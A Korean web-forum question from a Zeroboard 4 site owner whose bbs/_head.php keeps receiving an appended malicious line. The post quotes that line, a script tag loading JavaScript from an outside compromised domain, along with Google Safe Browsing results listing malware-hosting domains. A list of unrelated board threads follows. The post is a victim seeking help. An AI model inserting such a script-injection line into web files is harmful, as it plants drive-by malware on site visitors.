묻고답하기

인터넷을 많이 뒤져봤는데 뚜렷한 해결책을 못찾아서 여기에 질문을 올려봅니다.
(이미 해결책이 있는데 제가 잘 이해를 못한 것일 수도 있고요)


현재 제로보드4 버전을 사용해서 운영중인 홈페이지가 있습니다.

그런데 계속 악성코드가 삽입되어서 골머리를 썩고 있습니다.


bbs/_head.php 라는 파일의 가장 마지막줄에

<?ob_start();?><script src="http://www.wsart.net/bbs/data/js/common.js></script>

라는 내용이 삽입되어서

_head.php를 인클루드하고 있는 모든 페이지들이

영향을 받고 있습니다.

script태그의 src 내용은 매번 바뀝니다.


구글의 안전브라우징 진단검사는 아래와 같습니다.

Google이 사이트를 방문했을 때의 결과

지난 90일간 진행된 사이트 테스트에서 68개의 페이지 가운데 8개에서 사용자 동의 없이 악성 소프트웨어가 다운로드 및 설치된 것으로 확인되었습니다. Google이 사이트에 마지막으로 방문한 것은 2011-04-10이며, 의심되는 콘텐츠가 마지막으로 발견된 것은 2011-04-10입니다.

Malicious software includes 3 scripting exploit(s), 3 exploit(s). Successful infection resulted in an average of 4 new process(es) on the target machine.

wkmg.co.kr/sporam.com/을(를) 포함한 2개의 도메인에서 악성 소프트웨어를 호스팅하고 있습니다.

interbar.co.kr/을(를) 비롯한 1개의 도메인이 이 사이트 방문자에게 악성코드를 유포하는 중개 역할을 한 것으로 나타났습니다.

This site was hosted on 1 network(s) including AS3786 (ERX).



혹시 이 취약점이 어떤 방식으로 해서 들어오는것인지

그리고 해결법을 알고 계신분 있으신가요???
글쓴이 제목 최종 글
XE 공지 글 쓰기,삭제 운영방식 변경 공지 [16] 2019.03.05 by 남기남
OG랖 로그인 풀림현상 문의  
MustLuv™ 화면이 백지로 뜹니다. [5] 2009.03.26 by 비나무
khanyong 외부에서는 접속이 되는데 서버컴에서는 404 에러가 뜹니다.  
jih449 관리자셋팅에 ftp정보와 기본 url 의 중요성을 알려주세요.  
박노열 삭제해야 하는가에 대한 답을 구합니다. [2] file 2009.03.26 by 박노열
텍사수 modules/file/file.controller.php 파일중에서...  
김태균773 방명록에 에디터 숨길수 없나요? [3] 2009.03.26 by kangho
제갈공명825 설치시 이 에러는 왜? [1] 2009.03.26 by 비나무
거북 버튼 이미지가 기존 버튼이랑 겹치는데 어떻게 해야할지.;; file  
긴급 게시글 이전 안됨  
박상범473 1차 메뉴 색상 변경 문의 입니다 도와주세요 [2] file 2009.03.26 by 박상범473
석이- 게시판 관리에서 권한관리, 스킨관리 내용이 보이지 않습니다.. [1] 2009.03.26 by 석이-
신덕균 unknown column ''extra_vars" field list 오류 질문  
홀바인 외부페이지에 있는 게시판의 최근게시물을 탭형태 최근문서 출력에서 출력하는 방법이...  
Beckham 대암지기님 웹진형 확장변수 게시판 질문 file  
양규열881 제로보드 오류 관련 문의 입니다. [1] file 2009.03.26 by 유팔복
블랙카드 위젯스타일 사용 안할순 없나요?? [1] 2009.03.26 by miso777
b_jay 게시판에 여백 주는 방법 알려주세요 [6] file 2009.03.26 by b_jay
레시테 1.1.5에 1.2.0 통합검색스킨 적용방법 질문드립니다.  
Westminster Way 그누보드 게시판 데이터 xe로 이전시 문제!! 1.2.0 에서는 확장변수값이 안들어옵니다.